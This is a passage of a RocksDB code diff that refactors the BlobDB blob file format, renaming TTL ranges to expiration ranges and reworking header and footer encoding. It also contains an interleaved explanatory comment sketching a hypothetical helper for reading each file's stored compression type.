bfile->header_.compression_ = bdb_options_.compression; + bfile->header_.expiration_range = expiration_range; + bfile->header_.compression = bdb_options_.compression; + bfile->header_.has_ttl = true; bfile->header_valid_ = true; - bfile->file_size_ = BlobLogHeader::kHeaderSize; + bfile->SetHasTTL(true); + bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is // concrete at this time.
also necessary to add to open_blob_files_ - bfile->ttl_range_ = ttl_guess; + bfile->expiration_range_ = expiration_range; WriteLock wl(&mutex_); // in case the epoch has shifted in the interim, then check @@ -878,8 +871,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, Slice value_compressed = GetCompressedSlice(value, &compression_output); std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration, - -1); + Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration); s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration, &index_entry); @@ -887,7 +879,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, if (s.ok()) { bfile->ExtendSequenceRange(sequence); if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); + bfile->ExtendExpirationRange(expiration); } s = CloseBlobFileIfNeeded(bfile); if (s.ok()) { @@ -1045,7 +1037,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, // later from the Blob Header, which needs to be also a // valid offset. if (blob_index.offset() < - (BlobLogHeader::kHeaderSize + BlobLogRecord::kHeaderSize + key.size())) { + (BlobLogHeader::kSize + BlobLogRecord::kHeaderSize + key.size())) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Invalid blob index file_number: %" PRIu64 @@ -1085,7 +1077,9 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, valueptr = &value_c; } - // allocate the buffer. This is safe in C++11 + // Allocate the buffer. This is safe in C++11 + // Note that std::string::reserve() does not work, since the previous value + // of the buffer can be larger than blob_index.size(). valueptr->resize(blob_index.size()); char* buffer = &(*valueptr)[0]; @@ -1103,6 +1097,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::NotFound("Blob Not Found as couldn't retrieve Blob"); } + // TODO(yiwu): Add an option to skip crc checking. Slice crc_slice; uint32_t crc_exp; std::string crc_str; @@ -1121,7 +1116,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::NotFound("Blob Not Found as couldn't retrieve CRC"); } - uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); + uint32_t crc = crc32c::Value(key.data(), key.size()); + crc = crc32c::Extend(crc, blob_value.data(), blob_value.size()); crc = crc32c::Mask(crc); // Adjust for storage if (crc != crc_exp) { if (debug_level_ >= 2) { @@ -1134,6 +1130,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::Corruption("Corruption. Blob CRC mismatch"); } + // TODO(yiwu): Should use compression flag in the blob file instead of + // current compression option.
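// The TODO above flags a real pitfall: decompression is keyed off the current
// bdb_options_.compression instead of the compression byte that this patch
// series records in each blob file's header, so changing the option on an
// existing DB could misread older files. A hedged sketch of the direction the
// TODO points at, using the header_ fields introduced here (the helper name
// is hypothetical, not part of the patch):
CompressionType GetCompressionTypeForBlobFile(
    const std::shared_ptr<BlobFile>& bfile,
    const BlobDBOptions& current_options) {
  if (bfile->header_valid_) {
    // Trust the per-file byte written when the file was created.
    return bfile->header_.compression;
  }
  // Fall back to the configured codec for files whose header was not parsed.
  return current_options.compression;
}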
if (bdb_options_.compression != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily()); @@ -1204,7 +1202,7 @@ std::pair<bool, int64_t> BlobDBImpl::SanityCheck(bool aborted) { "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64, bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(), bfile->deleted_count_, bfile->deleted_size_, - (bfile->ttl_range_.second - epoch_now)); + (bfile->expiration_range_.second - epoch_now)); } // reschedule @@ -1255,7 +1253,7 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( const std::shared_ptr<BlobFile>& bfile) { assert(bfile->Obsolete()); - SequenceNumber esn = bfile->GetSNRange().first; + SequenceNumber esn = bfile->GetSequenceRange().first; // TODO(yiwu): Here we should check instead if there is an active snapshot // lies between the first sequence in the file, and the last sequence by @@ -1412,7 +1410,7 @@ std::pair<bool, int64_t> BlobDBImpl::CheckSeqFiles(bool aborted) { { ReadLock lockbfile_r(&bfile->mutex_); - if (bfile->ttl_range_.second > epoch_now) continue; + if (bfile->expiration_range_.second > epoch_now) continue; process_files.push_back(bfile); } } @@ -1586,22 +1584,24 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, bool first_gc = bfptr->gc_once_after_open_; - auto* cfh = bfptr->GetColumnFamily(db_); + auto* cfh = + db_impl_->GetColumnFamilyHandleUnlocked(bfptr->column_family_id()); auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd(); auto column_family_id = cfd->GetID(); - bool has_ttl = header.HasTTL(); + bool has_ttl = header.has_ttl; // this reads the key but skips the blob Reader::ReadLevel shallow = Reader::kReadHeaderKey; - bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); + bool no_relocation_ttl = + (has_ttl && now >= bfptr->GetExpirationRange().second); bool no_relocation_lsmdel = false; { ReadLock lockbfile_r(&bfptr->mutex_); - no_relocation_lsmdel = (bfptr->GetFileSize() == - (BlobLogHeader::kHeaderSize + bfptr->deleted_size_ + - BlobLogFooter::kFooterSize)); + no_relocation_lsmdel = + (bfptr->GetFileSize() == + (BlobLogHeader::kSize + bfptr->deleted_size_ + BlobLogFooter::kSize)); } bool no_relocation = no_relocation_ttl || no_relocation_lsmdel; @@ -1640,7 +1640,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, bool is_blob_index = false; PinnableSlice index_entry; Status get_status = db_impl_->GetImpl( - ReadOptions(), cfh, record.Key(), &index_entry, nullptr /*value_found*/, + ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); if (!get_status.ok() && !get_status.IsNotFound()) { @@ -1671,15 +1671,15 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, continue; } - GarbageCollectionWriteCallback callback(cfd, record.Key(), latest_seq); + GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq); // If key has expired, remove it from base DB.
- if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { + if (no_relocation_ttl || (has_ttl && now >= record.expiration)) { gc_stats->num_deletes++; - gc_stats->deleted_size += record.GetBlobSize(); + gc_stats->deleted_size += record.value_size; TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); WriteBatch delete_batch; - Status delete_status = delete_batch.Delete(record.Key()); + Status delete_status = delete_batch.Delete(record.key); if (delete_status.ok()) { delete_status = db_impl_->WriteWithCallback(WriteOptions(), &delete_batch, &callback); @@ -1718,7 +1718,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, newfile->header_ = std::move(header); // Can't use header beyond this point newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; + newfile->file_size_ = BlobLogHeader::kSize; s = new_writer->WriteHeader(newfile->header_); if (!s.ok()) { @@ -1740,21 +1740,21 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, uint64_t new_blob_offset = 0; uint64_t new_key_offset = 0; // write the blob to the blob log. - s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, - &new_blob_offset, record.GetTTL()); + s = new_writer->AddRecord(record.key, record.value, record.expiration, + &new_key_offset, &new_blob_offset); BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(), - new_blob_offset, record.Blob().size(), + new_blob_offset, record.value.size(), bdb_options_.compression); newfile->blob_count_++; newfile->file_size_ += - BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); + BlobLogRecord::kHeaderSize + record.key.size() + record.value.size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); WriteBatch rewrite_batch; Status rewrite_status = WriteBatchInternal::PutBlobIndex( - &rewrite_batch, column_family_id, record.Key(), new_index_entry); + &rewrite_batch, column_family_id, record.key, new_index_entry); if (rewrite_status.ok()) { rewrite_status = db_impl_->WriteWithCallback(WriteOptions(), &rewrite_batch, &callback); @@ -1797,8 +1797,8 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr<BlobFile> bfile, uint64_t now, bool is_oldest_simple_blob_file, std::string* reason) { if (bfile->HasTTL()) { - ttlrange_t ttl_range = bfile->GetTTLRange(); - if (now > ttl_range.second) { + ExpirationRange expiration_range = bfile->GetExpirationRange(); + if (now > expiration_range.second) { *reason = "entire file ttl expired"; return true; } @@ -1941,11 +1941,12 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr<BlobFile> bfile) { return false; } - ColumnFamilyHandle* cfh = bfile->GetColumnFamily(db_); + ColumnFamilyHandle* cfh = + db_impl_->GetColumnFamilyHandleUnlocked(bfile->column_family_id()); BlobLogRecord record; Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; while (reader->ReadRecord(&record, full).ok()) { - bdb_options_.gc_evict_cb_fn(cfh, record.Key(), record.Blob()); + bdb_options_.gc_evict_cb_fn(cfh, record.key, record.value); } return true; @@ -2038,15 +2039,15 @@ void BlobDBImpl::FilterSubsetOfFiles( "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 " reason='%s'", bfile->PathName().c_str(), now, - bfile->GetTTLRange().second, reason.c_str()); + bfile->GetExpirationRange().second, reason.c_str()); continue; } ROCKS_LOG_INFO(db_options_.info_log, "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64 " reason='%s'", - bfile->PathName().c_str(), now, bfile->GetTTLRange().second, - reason.c_str()); + bfile->PathName().c_str(), now, +
bfile->GetExpirationRange().second, reason.c_str()); to_process->push_back(bfile); } } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6f16e5b3d4c..85507eb5f00 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -1012,11 +1012,11 @@ TEST_F(BlobDBTest, InlineSmallValues) { ttl_file = blob_files[1]; } ASSERT_FALSE(non_ttl_file->HasTTL()); - ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSNRange().first); - ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSNRange().second); + ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSequenceRange().first); + ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSequenceRange().second); ASSERT_TRUE(ttl_file->HasTTL()); - ASSERT_EQ(first_ttl_seq, ttl_file->GetSNRange().first); - ASSERT_EQ(last_ttl_seq, ttl_file->GetSNRange().second); + ASSERT_EQ(first_ttl_seq, ttl_file->GetSequenceRange().first); + ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second); } } // namespace blob_db diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index e9b7351bb23..b7ae8162d44 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -18,7 +18,6 @@ #include "rocksdb/convenience.h" #include "rocksdb/env.h" #include "util/coding.h" -#include "util/crc32c.h" #include "util/string_util.h" namespace rocksdb { @@ -92,7 +91,7 @@ Status BlobDumpTool::Read(uint64_t offset, size_t size, Slice* result) { Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { Slice slice; - Status s = Read(0, BlobLogHeader::kHeaderSize, &slice); + Status s = Read(0, BlobLogHeader::kSize, &slice); if (!s.ok()) { return s; } @@ -102,20 +101,19 @@ Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { return s; } fprintf(stdout, "Blob log header:\n"); - fprintf(stdout, " Magic Number : %" PRIu32 "\n", header.magic_number()); - fprintf(stdout, " Version : %" PRIu32 "\n", header.version()); - CompressionType compression = header.compression(); + fprintf(stdout, " Version : %" PRIu32 "\n", header.version); + fprintf(stdout, " Column Family ID : %" PRIu32 "\n", + header.column_family_id); std::string compression_str; - if (!GetStringFromCompressionType(&compression_str, compression).ok()) { + if (!GetStringFromCompressionType(&compression_str, header.compression) + .ok()) { compression_str = "Unrecongnized compression type (" + - ToString((int)header.compression()) + ")"; - } - fprintf(stdout, " Compression : %s\n", compression_str.c_str()); - fprintf(stdout, " TTL Range : %s\n", - GetString(header.ttl_range()).c_str()); - fprintf(stdout, " Timestamp Range: %s\n", - GetString(header.ts_range()).c_str()); - *offset = BlobLogHeader::kHeaderSize; + ToString((int)header.compression) + ")"; + } + fprintf(stdout, " Compression : %s\n", compression_str.c_str()); + fprintf(stdout, " Expiration range : %s\n", + GetString(header.expiration_range).c_str()); + *offset = BlobLogHeader::kSize; return s; } @@ -126,20 +124,12 @@ Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size, fprintf(stdout, "No blob log footer.\n"); return Status::OK(); }; - if (file_size < BlobLogHeader::kHeaderSize + BlobLogFooter::kFooterSize) { + if (file_size < BlobLogHeader::kSize + BlobLogFooter::kSize) { return no_footer(); } Slice slice; - Status s = Read(file_size - 4, 4, &slice); - if (!s.ok()) { - return s; - } - uint32_t magic_number = DecodeFixed32(slice.data()); - if (magic_number != kMagicNumber) { - return no_footer(); - } - *footer_offset = file_size - BlobLogFooter::kFooterSize; - 
s = Read(*footer_offset, BlobLogFooter::kFooterSize, &slice); + *footer_offset = file_size - BlobLogFooter::kSize; + Status s = Read(*footer_offset, BlobLogFooter::kSize, &slice); if (!s.ok()) { return s; } @@ -149,13 +139,11 @@ Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size, return s; } fprintf(stdout, "Blob log footer:\n"); - fprintf(stdout, " Blob count : %" PRIu64 "\n", footer.GetBlobCount()); - fprintf(stdout, " TTL Range : %s\n", - GetString(footer.GetTTLRange()).c_str()); - fprintf(stdout, " Time Range : %s\n", - GetString(footer.GetTimeRange()).c_str()); - fprintf(stdout, " Sequence Range : %s\n", - GetString(footer.GetSNRange()).c_str()); + fprintf(stdout, " Blob count : %" PRIu64 "\n", footer.blob_count); + fprintf(stdout, " Expiration Range : %s\n", + GetString(footer.expiration_range).c_str()); + fprintf(stdout, " Sequence Range : %s\n", + GetString(footer.sequence_range).c_str()); return s; } @@ -173,41 +161,25 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, if (!s.ok()) { return s; } - uint32_t key_size = record.GetKeySize(); - uint64_t blob_size = record.GetBlobSize(); - fprintf(stdout, " key size : %" PRIu32 "\n", key_size); - fprintf(stdout, " blob size : %" PRIu64 "\n", record.GetBlobSize()); - fprintf(stdout, " TTL : %" PRIu64 "\n", record.GetTTL()); - fprintf(stdout, " time : %" PRIu64 "\n", record.GetTimeVal()); - fprintf(stdout, " type : %d, %d\n", record.type(), record.subtype()); - fprintf(stdout, " header CRC : %" PRIu32 "\n", record.header_checksum()); - fprintf(stdout, " CRC : %" PRIu32 "\n", record.checksum()); - uint32_t header_crc = - crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); + uint64_t key_size = record.key_size; + uint64_t value_size = record.value_size; + fprintf(stdout, " key size : %" PRIu64 "\n", key_size); + fprintf(stdout, " value size : %" PRIu64 "\n", value_size); + fprintf(stdout, " expiration : %" PRIu64 "\n", record.expiration); *offset += BlobLogRecord::kHeaderSize; - s = Read(*offset, key_size + blob_size, &slice); + s = Read(*offset, key_size + value_size, &slice); if (!s.ok()) { return s; } - header_crc = crc32c::Extend(header_crc, slice.data(), key_size); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record.header_checksum()) { - return Status::Corruption("Record header checksum mismatch."); - } - uint32_t blob_crc = crc32c::Extend(0, slice.data() + key_size, blob_size); - blob_crc = crc32c::Mask(blob_crc); - if (blob_crc != record.checksum()) { - return Status::Corruption("Blob checksum mismatch."); - } if (show_key != DisplayType::kNone) { fprintf(stdout, " key : "); DumpSlice(Slice(slice.data(), key_size), show_key); if (show_blob != DisplayType::kNone) { fprintf(stdout, " blob : "); - DumpSlice(Slice(slice.data() + key_size, blob_size), show_blob); + DumpSlice(Slice(slice.data() + key_size, value_size), show_blob); } } - *offset += key_size + blob_size; + *offset += key_size + value_size; return s; } diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 9989bacf3d8..d50256ca665 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -15,6 +15,8 @@ #include #include +#include "db/column_family.h" +#include "db/db_impl.h" #include "db/dbformat.h" #include "util/filename.h" #include "util/logging.h" @@ -27,6 +29,7 @@ namespace blob_db { BlobFile::BlobFile() : parent_(nullptr), file_number_(0), + has_ttl_(false), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -35,9 +38,8 @@ BlobFile::BlobFile() 
closed_(false), can_be_deleted_(false), gc_once_after_open_(false), - ttl_range_(std::make_pair(0, 0)), - time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(kMaxSequenceNumber, 0)), + expiration_range_({0, 0}), + sequence_range_({kMaxSequenceNumber, 0}), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -46,6 +48,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) : parent_(p), path_to_dir_(bdir), file_number_(fn), + has_ttl_(false), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -54,9 +57,8 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) closed_(false), can_be_deleted_(false), gc_once_after_open_(false), - ttl_range_(std::make_pair(0, 0)), - time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(kMaxSequenceNumber, 0)), + expiration_range_({0, 0}), + sequence_range_({kMaxSequenceNumber, 0}), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -72,6 +74,13 @@ BlobFile::~BlobFile() { } } +uint32_t BlobFile::column_family_id() const { + // TODO(yiwu): Should return column family id encoded in blob file after + // we add blob db column family support. + return reinterpret_cast(parent_->DefaultColumnFamily()) + ->GetID(); +} + std::string BlobFile::PathName() const { return BlobFileName(path_to_dir_, file_number_); } @@ -101,13 +110,14 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d ttl_range: (%" PRIu64 ", %" PRIu64 - ") sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", + " closed: %d can_be_deleted: %d expiration_range: (%" PRIu64 + ", %" PRIu64 ") sequence_range: (%" PRIu64 " %" PRIu64 + "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, - closed_.load(), can_be_deleted_.load(), ttl_range_.first, - ttl_range_.second, sn_range_.first, sn_range_.second, - (!!log_writer_), (!!ra_file_reader_)); + closed_.load(), can_be_deleted_.load(), expiration_range_.first, + expiration_range_.second, sequence_range_.first, + sequence_range_.second, (!!log_writer_), (!!ra_file_reader_)); return str; } @@ -122,17 +132,18 @@ Status BlobFile::WriteFooterAndCloseLocked() { "File is being closed after footer %s", PathName().c_str()); BlobLogFooter footer; - footer.blob_count_ = blob_count_; - if (HasTTL()) footer.set_ttl_range(ttl_range_); + footer.blob_count = blob_count_; + if (HasTTL()) { + footer.expiration_range = expiration_range_; + } - footer.sn_range_ = sn_range_; - if (HasTimestamp()) footer.set_time_range(time_range_); + footer.sequence_range = sequence_range_; // this will close the file and reset the Writable File Pointer. 
Status s = log_writer_->AppendFooter(footer); if (s.ok()) { closed_ = true; - file_size_ += BlobLogFooter::kFooterSize; + file_size_ += BlobLogFooter::kSize; } else { ROCKS_LOG_ERROR(parent_->db_options_.info_log, "Failure to read Header for blob-file %s", @@ -144,20 +155,20 @@ Status BlobFile::WriteFooterAndCloseLocked() { } Status BlobFile::ReadFooter(BlobLogFooter* bf) { - if (file_size_ < (BlobLogHeader::kHeaderSize + BlobLogFooter::kFooterSize)) { + if (file_size_ < (BlobLogHeader::kSize + BlobLogFooter::kSize)) { return Status::IOError("File does not have footer", PathName()); } - uint64_t footer_offset = file_size_ - BlobLogFooter::kFooterSize; + uint64_t footer_offset = file_size_ - BlobLogFooter::kSize; // assume that ra_file_reader_ is valid before we enter this assert(ra_file_reader_); Slice result; - char scratch[BlobLogFooter::kFooterSize + 10]; - Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kFooterSize, - &result, scratch); + char scratch[BlobLogFooter::kSize + 10]; + Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kSize, &result, + scratch); if (!s.ok()) return s; - if (result.size() != BlobLogFooter::kFooterSize) { + if (result.size() != BlobLogFooter::kSize) { // should not happen return Status::IOError("EOF reached before footer"); } @@ -167,21 +178,12 @@ Status BlobFile::ReadFooter(BlobLogFooter* bf) { } Status BlobFile::SetFromFooterLocked(const BlobLogFooter& footer) { - if (footer.HasTTL() != header_.HasTTL()) { - return Status::Corruption("has_ttl mismatch"); - } - if (footer.HasTimestamp() != header_.HasTimestamp()) { - return Status::Corruption("has_ts mismatch"); - } - // assume that file has been fully fsync'd last_fsync_.store(file_size_); - blob_count_ = footer.GetBlobCount(); - ttl_range_ = footer.GetTTLRange(); - time_range_ = footer.GetTimeRange(); - sn_range_ = footer.GetSNRange(); + blob_count_ = footer.blob_count; + expiration_range_ = footer.expiration_range; + sequence_range_ = footer.sequence_range; closed_ = true; - return Status::OK(); } @@ -229,10 +231,6 @@ std::shared_ptr BlobFile::GetOrOpenRandomAccessReader( return ra_file_reader_; } -ColumnFamilyHandle* BlobFile::GetColumnFamily(DB* db) { - return db->DefaultColumnFamily(); -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index a18bf778abe..455383448bb 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -13,11 +13,14 @@ #include "rocksdb/options.h" #include "util/file_reader_writer.h" #include "utilities/blob_db/blob_log_format.h" +#include "utilities/blob_db/blob_log_reader.h" #include "utilities/blob_db/blob_log_writer.h" namespace rocksdb { namespace blob_db { +class BlobDBImpl; + class BlobFile { friend class BlobDBImpl; friend struct blobf_compare_ttl; @@ -34,6 +37,10 @@ class BlobFile { // after that uint64_t file_number_; + // If true, the keys in this file all has TTL. Otherwise all keys don't + // have TTL. + bool has_ttl_; + // number of blobs in the file std::atomic blob_count_; @@ -62,14 +69,9 @@ class BlobFile { // should this file been gc'd once to reconcile lost deletes/compactions std::atomic gc_once_after_open_; - // et - lt of the blobs - ttlrange_t ttl_range_; - - // et - lt of the timestamp of the KV pairs. 
- tsrange_t time_range_; + ExpirationRange expiration_range_; - // ESN - LSN of the blobs - snrange_t sn_range_; + SequenceRange sequence_range_; // Sequential/Append writer for blobs std::shared_ptr log_writer_; @@ -96,7 +98,7 @@ class BlobFile { ~BlobFile(); - ColumnFamilyHandle* GetColumnFamily(DB* db); + uint32_t column_family_id() const; // Returns log file's pathname relative to the main db dir // Eg. For a live-log-file = blob_dir/000003.blob @@ -128,30 +130,29 @@ class BlobFile { } // All Get functions which are not atomic, will need ReadLock on the mutex - tsrange_t GetTimeRange() const { - assert(HasTimestamp()); - return time_range_; - } - - ttlrange_t GetTTLRange() const { return ttl_range_; } - snrange_t GetSNRange() const { return sn_range_; } + ExpirationRange GetExpirationRange() const { return expiration_range_; } - bool HasTTL() const { - assert(header_valid_); - return header_.HasTTL(); + void ExtendExpirationRange(uint64_t expiration) { + expiration_range_.first = std::min(expiration_range_.first, expiration); + expiration_range_.second = std::max(expiration_range_.second, expiration); } - bool HasTimestamp() const { - assert(header_valid_); - return header_.HasTimestamp(); + SequenceRange GetSequenceRange() const { return sequence_range_; } + + void SetSequenceRange(SequenceRange sequence_range) { + sequence_range_ = sequence_range; } void ExtendSequenceRange(SequenceNumber sequence) { - sn_range_.first = std::min(sn_range_.first, sequence); - sn_range_.second = std::max(sn_range_.second, sequence); + sequence_range_.first = std::min(sequence_range_.first, sequence); + sequence_range_.second = std::max(sequence_range_.second, sequence); } + bool HasTTL() const { return has_ttl_; } + + void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; } + std::shared_ptr GetWriter() const { return log_writer_; } void Fsync(); @@ -174,11 +175,9 @@ class BlobFile { // previously closed file Status SetFromFooterLocked(const BlobLogFooter& footer); - void set_time_range(const tsrange_t& tr) { time_range_ = tr; } - - void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; } - - void SetSNRange(const snrange_t& snr) { sn_range_ = snr; } + void set_expiration_range(const ExpirationRange& expiration_range) { + expiration_range_ = expiration_range; + } // The following functions are atomic, and don't need locks void SetFileSize(uint64_t fs) { file_size_ = fs; } diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index 2e6fa3c63c9..eb748ac994c 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -6,284 +6,145 @@ #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_log_format.h" + #include "util/coding.h" #include "util/crc32c.h" namespace rocksdb { namespace blob_db { -const uint32_t kMagicNumber = 2395959; -const uint32_t kVersion1 = 1; -const size_t kBlockSize = 32768; - -BlobLogHeader::BlobLogHeader() - : magic_number_(kMagicNumber), compression_(kNoCompression) {} - -BlobLogHeader& BlobLogHeader::operator=(BlobLogHeader&& in) noexcept { - if (this != &in) { - magic_number_ = in.magic_number_; - version_ = in.version_; - ttl_guess_ = std::move(in.ttl_guess_); - ts_guess_ = std::move(in.ts_guess_); - compression_ = in.compression_; - } - return *this; +void BlobLogHeader::EncodeTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogHeader::kSize); + PutFixed32(dst, kMagicNumber); + PutFixed32(dst, version); + PutFixed32(dst, column_family_id); + unsigned char flags = (has_ttl 
? 1 : 0); + dst->push_back(flags); + dst->push_back(compression); + PutFixed64(dst, expiration_range.first); + PutFixed64(dst, expiration_range.second); } -BlobLogFooter::BlobLogFooter() : magic_number_(kMagicNumber), blob_count_(0) {} - -Status BlobLogFooter::DecodeFrom(const Slice& input) { - Slice slice(input); - uint32_t val; - if (!GetFixed32(&slice, &val)) { - return Status::Corruption("Invalid Blob Footer: flags"); - } - - bool has_ttl = false; - bool has_ts = false; - val >>= 8; - RecordSubType st = static_cast(val); - switch (st) { - case kRegularType: - break; - case kTTLType: - has_ttl = true; - break; - case kTimestampType: - has_ts = true; - break; - default: - return Status::Corruption("Invalid Blob Footer: flags_val"); - } - - if (!GetFixed64(&slice, &blob_count_)) { - return Status::Corruption("Invalid Blob Footer: blob_count"); - } - - ttlrange_t temp_ttl; - if (!GetFixed64(&slice, &temp_ttl.first) || - !GetFixed64(&slice, &temp_ttl.second)) { - return Status::Corruption("Invalid Blob Footer: ttl_range"); - } - if (has_ttl) { - ttl_range_.reset(new ttlrange_t(temp_ttl)); - } - - if (!GetFixed64(&slice, &sn_range_.first) || - !GetFixed64(&slice, &sn_range_.second)) { - return Status::Corruption("Invalid Blob Footer: sn_range"); - } - - tsrange_t temp_ts; - if (!GetFixed64(&slice, &temp_ts.first) || - !GetFixed64(&slice, &temp_ts.second)) { - return Status::Corruption("Invalid Blob Footer: ts_range"); - } - if (has_ts) { - ts_range_.reset(new tsrange_t(temp_ts)); - } - - if (!GetFixed32(&slice, &magic_number_) || magic_number_ != kMagicNumber) { - return Status::Corruption("Invalid Blob Footer: magic"); +Status BlobLogHeader::DecodeFrom(Slice src) { + static const std::string kErrorMessage = + "Error while decoding blob log header"; + if (src.size() != BlobLogHeader::kSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob file header size"); + } + uint32_t magic_number; + unsigned char flags; + if (!GetFixed32(&src, &magic_number) || !GetFixed32(&src, &version) || + !GetFixed32(&src, &column_family_id)) { + return Status::Corruption( + kErrorMessage, + "Error decoding magic number, version and column family id"); + } + if (magic_number != kMagicNumber) { + return Status::Corruption(kErrorMessage, "Magic number mismatch"); + } + if (version != kVersion1) { + return Status::Corruption(kErrorMessage, "Unknown header version"); + } + flags = src.data()[0]; + compression = static_cast(src.data()[1]); + has_ttl = (flags & 1) == 1; + src.remove_prefix(2); + if (!GetFixed64(&src, &expiration_range.first) || + !GetFixed64(&src, &expiration_range.second)) { + return Status::Corruption(kErrorMessage, "Error decoding expiration range"); } - return Status::OK(); } -void BlobLogFooter::EncodeTo(std::string* dst) const { - dst->reserve(kFooterSize); - - RecordType rt = kFullType; - RecordSubType st = kRegularType; - if (HasTTL()) { - st = kTTLType; - } else if (HasTimestamp()) { - st = kTimestampType; - } - uint32_t val = static_cast(rt) | (static_cast(st) << 8); - PutFixed32(dst, val); - - PutFixed64(dst, blob_count_); - bool has_ttl = HasTTL(); - bool has_ts = HasTimestamp(); - - if (has_ttl) { - PutFixed64(dst, ttl_range_.get()->first); - PutFixed64(dst, ttl_range_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } - 